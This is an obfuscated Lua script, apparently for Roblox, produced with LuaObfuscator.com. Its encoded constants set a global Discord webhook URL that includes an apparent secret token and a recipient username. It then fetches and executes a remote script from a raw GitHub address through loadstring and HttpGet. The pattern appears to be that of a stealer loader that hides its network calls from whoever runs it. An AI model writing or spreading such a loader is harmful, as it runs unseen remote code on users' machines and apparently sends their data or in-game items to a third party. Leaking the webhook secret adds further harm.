--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0;local v84;while true do if (v83==(0 -0)) then v84=(v31/((5 -3)^(v32-(1 -0))))%(2^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((838 + 94) -(857 + (105 -31))))) ;return v84-(v84%(569 -((1432 -(68 + 997)) + 201))) ;end end else local v85=(2197 -(226 + 1044)) -(214 + 713) ;local v86;while true do if (v85==0) then v86=((4 -3) + 1)^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and (878 -(282 + (712 -(32 + 85))))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=0 + (0 -0) ;local v35;while true do if ((0 + 0)==v34) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=2 -1 ;end if (v34==((351 -(87 + 263)) -0)) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (182 -(67 + 113)) ;return (v37 * (189 + 67)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + 4 ;return (v41 * (16778168 -(802 + 150))) + (v40 * (176444 -110908)) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=443 -(416 + 26) ;local v45=(v20(v43,1 -(0 -0) ,9 + 11 ) * ((1 + 1 + 0)^(470 -(145 + 293)))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -56 );local v47=((v20(v43,7 + 12 + 13 )==(1 -0)) and  -(1188 -((1954 -(261 + 624)) + 118))) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (772 -((357 -156) + 571)) ;else v46=(1081 -(1020 + 60)) + 0 ;v44=0 -0 ;end elseif (v46==(2031 + (1439 -(630 + 793)))) then return ((v45==0) and (v47 * (((2683 -1891) -(368 + 423))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/(((33 -26) -5)^(911 -(814 + 45))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v64=3 -2 , #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v66=241 -(187 + 54) ;while true do if (v66~=1) then else if (v51==(782 -(162 + 618))) then local v96=0 + 0 ;while true do if (v96~=(0 + 0)) then else for v100=1 -0 ,v23() do local v101=126 -(116 + 10) ;local v102;local v103;while true do if (v101==1) then while true do if (v102==(0 + 0)) then v103=v21();if (v20(v103,1,739 -(542 + 196) )~=(0 -0)) then else local v168=0 + 0 ;local v169;local v170;local v171;local v172;local v173;local v174;while true do if (v168~=(0 + 0)) then else v169=0 -0 ;v170=nil;v168=1 + 0 ;end if (v168~=(4 -2)) then else v173=nil;v174=nil;v168=7 -4 ;end if (v168==(1554 -(1126 + 425))) then while true do if (v169==(405 -(118 + 287))) then v170=0;v171=nil;v169=3 -2 ;end if ((1637 -(1373 + 263))==v169) then local v178=1000 -(451 + 549) ;while true do if (1~=v178) then else v169=1 + 1 ;break;end if (v178==0) then v172=nil;v173=nil;v178=2 -1 ;end end end if (v169==2) then v174=nil;while true do if (v170==(378 -(142 + 235))) then local v180=0;while true do if (v180~=(0 -0)) then else v173=nil;v174=nil;v180=1;end if (v180==1) then v170=2 -0 ;break;end end end if (v170==(0 -0)) then v171=0;v172=nil;v170=1385 -(746 + 638) ;end if ((3 -1)~=v170) then else while true do if (v171~=(1 + 1)) then else local v181=0 + 0 ;local v182;while true do if (v181==(0 -0)) then v182=0 + 0 ;while true do if (v182==(1 + 0)) then v171=344 -(218 + 123) ;break;end if (v182==0) then local v191=0 + 0 ;local v192;while true do if (v191==(1581 -(1535 + 46))) then v192=0 + 0 ;while true do if (v192==1) then v182=1 + 0 ;break;end if (v192==(560 -(306 + 254))) then local v194=0;while true do if (v194==(1 + 0)) then v192=1 -0 ;break;end if (v194==0) then if (v20(v173,1468 -(899 + 568) ,1 + 0 )~=(1 + 0)) then else v174[9 -7 ]=v57[v174[4 -2 ]];end if (v20(v173,605 -(268 + 335) ,2)==(291 -(60 + 230))) then v174[3]=v57[v174[575 -(426 + 146) ]];end v194=1 + 0 ;end end end end break;end end end end break;end end end if ((2 + 1)==v171) then if (v20(v173,3,6 -3 )~=(1457 -(282 + 1174))) then else v174[815 -(569 + 242) ]=v57[v174[11 -7 ]];end v52[v100]=v174;break;end if (v171==(1 + 0)) then local v184=0 + 0 ;local v185;local v186;while true do if (v184==(1 -0)) then while true do if ((0 -0)==v185) then v186=238 -(64 + 174) ;while true do if (v186==(1 + 0)) then v171=2;break;end if ((1024 -(706 + 318))~=v186) then else v174={v22(),v22(),nil,nil};if (v172==0) then local v193=1271 -(945 + 326) ;while true do if (v193==(0 -0)) then v174[3 + 0 ]=v22();v174[704 -(271 + 429) ]=v22();break;end end elseif (v172==(1 + 0)) then v174[2 + 1 ]=v23();elseif (v172==(1506 -(363 + 1141))) then v174[1503 -(1408 + 92) ]=v23() -((1088 -(461 + 625))^(1304 -(993 + 295))) ;elseif (v172==(1 + 2)) then local v203=0;local v204;while true do if (v203~=(1171 -(418 + 753))) then else v204=0 + 0 ;while true do if (v204~=(0 + 0)) then else v174[1 + 2 ]=v23() -((1 + 1)^(5 + 11)) ;v174[1937 -(565 + 1368) ]=v22();break;end end break;end end end v186=3 -2 ;end end break;end end break;end if (v184==0) then v185=529 -(406 + 123) ;v186=nil;v184=1770 -(1749 + 20) ;end end end if (v171==(0 + 0)) then local v187=1322 -(1249 + 73) ;while true do if (v187==(1 + 0)) then v171=1;break;end if (v187==(1145 -(466 + 679))) then local v190=0 -0 ;while true do if (v190==(2 -1)) then v187=1901 -(106 + 1794) ;break;end if (v190==(0 -0)) then v172=v20(v103,2,1 + 2 );v173=v20(v103,308 -(244 + 60) ,6);v190=1 + 0 ;end end end end end end break;end end break;end end break;end if (v168==(477 -(41 + 435))) then v171=nil;v172=nil;v168=1003 -(938 + 63) ;end end end break;end end break;end if (v101==(0 + 0)) then v102=0 -0 ;v103=nil;v101=1 + 0 ;end end end for v104=2 -1 ,v23() do v53[v104-(115 -(4 + 110)) ]=v28();end v96=585 -(57 + 527) ;end if (v96~=(1139 -(782 + 356))) then else return v55;end end end break;end if (v66==(267 -(176 + 91))) then local v91=1427 -(41 + 1386) ;while true do if (v91~=(104 -(17 + 86))) then else v66=1;break;end if (v91==0) then if (v51==(1 + 0)) then local v97=0 -0 ;local v98;while true do if (v97==(0 -0)) then v98=0;while true do if (v98==1) then for v163=1,v56 do local v164=166 -(122 + 44) ;local v165;local v166;local v167;while true do if (v164~=(0 -0)) then else local v175=0 -0 ;while true do if (v175~=(3 -2)) then else v164=1 + 0 ;break;end if (v175==(1018 -(697 + 321))) then v165=0;v166=nil;v175=1;end end end if (v164~=(2 -1)) then else v167=nil;while true do if (v165==(0 + 0)) then local v176=0 -0 ;while true do if (1==v176) then v165=1;break;end if ((0 + 0)~=v176) then else local v179=65 -(30 + 35) ;while true do if (v179==1) then v176=1 -0 ;break;end if (v179~=(0 + 0)) then else v166=v21();v167=nil;v179=1228 -(322 + 905) ;end end end end end if (v165==(1258 -(1043 + 214))) then if (v166==1) then v167=v21()~=0 ;elseif (v166==2) then v167=v24();elseif (v166~=(11 -8)) then else v167=v25();end v57[v163]=v167;break;end end break;end end end v55[3]=v21();v98=1214 -(323 + 889) ;end if (v98~=(0 -0)) then else v56=v23();v57={};v98=1;end if (v98~=(1191 -(449 + 740))) then else v51=2;break;end end break;end end end if (v51==(872 -(826 + 46))) then local v99=0;while true do if (v99~=(581 -(361 + 219))) then else local v120=947 -(245 + 702) ;while true do if (1~=v120) then else v99=6 -4 ;break;end if (v120==0) then v54={};v55={v52,v53,nil,v54};v120=414 -(15 + 398) ;end end end if (v99~=2) then else v51=983 -(18 + 964) ;break;end if (v99==(0 -0)) then local v121=0 -0 ;while true do if (v121==(0 + 0)) then v52={};v53={};v121=1;end if (v121~=(1 + 0)) then else v99=1 + 0 ;break;end end end end end v91=851 -(20 + 830) ;end end end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v67=v61;local v68=v62;local v69=v63;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then v77[v79[2]]=v79[3]~=0 ;else local v107=v79[2];local v108,v109=v70(v77[v107](v13(v77,v107 + 1 ,v79[3])));v72=(v109 + v107) -1 ;local v110=0;for v118=v107,v72 do local v119=0;while true do if (v119==0) then v110=v110 + 1 ;v77[v118]=v108[v110];break;end end end end elseif (v80<=2) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==3) then v71=v79[3];else v77[v79[2]]=v79[3];end elseif (v80<=7) then if (v80<=5) then v77[v79[2]]=v79[3]~=0 ;elseif (v80==6) then local v126=v79[2];local v127=v77[v79[3]];v77[v126 + 1 ]=v127;v77[v126]=v127[v79[4]];else local v131=0;local v132;while true do if (0==v131) then v132=v79[2];v77[v132]=v77[v132](v13(v77,v132 + 1 ,v72));break;end end end elseif (v80<=8) then v77[v79[2]]();elseif (v80>9) then v77[v79[2]]=v79[3];else do return;end end elseif (v80<=15) then if (v80<=12) then if (v80>11) then local v112=0;local v113;while true do if (v112==0) then v113=v79[2];v77[v113]=v77[v113](v13(v77,v113 + 1 ,v72));break;end end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=13) then do return;end elseif (v80==14) then local v135=0;local v136;local v137;while true do if (v135==1) then v77[v136 + 1 ]=v137;v77[v136]=v137[v79[4]];break;end if (0==v135) then v136=v79[2];v137=v77[v79[3]];v135=1;end end else local v138=v79[2];local v139,v140=v70(v77[v138](v13(v77,v138 + 1 ,v79[3])));v72=(v140 + v138) -1 ;local v141=0;for v149=v138,v72 do v141=v141 + 1 ;v77[v149]=v139[v141];end end elseif (v80<=18) then if (v80<=16) then v77[v79[2]]();elseif (v80>17) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]=v60[v79[3]];end elseif (v80<=19) then v77[v79[2]]=v60[v79[3]];elseif (v80==20) then v71=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132333833362O32363O393433313237392F4B41576430534A462O5237346945594C794F4A35314459564B67795F52484558374D30534237473456523858753445794C6C4B4E43793874444A4346754E726744537658030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03013O004703083O00557365724E616D65030D3O007975646970756E2O676F6C323703093O00557365724E616D653200173O00120A3O00013O0026023O000E000100020004033O000E0001001211000100033O003012000100040005001211000100063O001211000200073O00200E00020002000800120A000400094O0005000500014O0001000200054O000C00013O00022O00100001000100010004033O001600010026023O0001000100010004033O000100010012110001000A3O0030120001000B000C001211000100033O0030120001000D000C00120A3O00023O0004033O000100012O000D3O00017O00",v9(),...);end
